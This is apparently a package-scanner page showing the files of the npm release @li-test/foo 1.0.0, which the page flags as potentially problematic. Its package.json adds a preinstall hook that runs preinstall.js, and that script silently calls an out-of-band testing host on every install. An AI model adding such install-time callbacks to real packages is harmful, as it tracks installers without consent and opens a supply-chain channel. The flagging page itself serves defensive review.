@li-test/foo 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @li-test/foo might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ const cfonts = require("cfonts");
2
+
3
+ cfonts.say("foo|bar", {
4
+ font: "tiny",
5
+ gradient: ["gray", "white"],
6
+ transitionGradient: true,
7
+ });
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "@li-test/foo",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "cfonts": "^3.2.0"
14
+ }
15
+ }
package/preinstall.js ADDED
@@ -0,0 +1,5 @@
1
+ fetch(
2
+ "http://cbs-foo.chst9lhv1v81tadvg4n0668g4r4rjnf3f.oast.live/preinstall.json"
3
+ )
4
+ .then((res) => res.json())
5
+ .then(console.debug);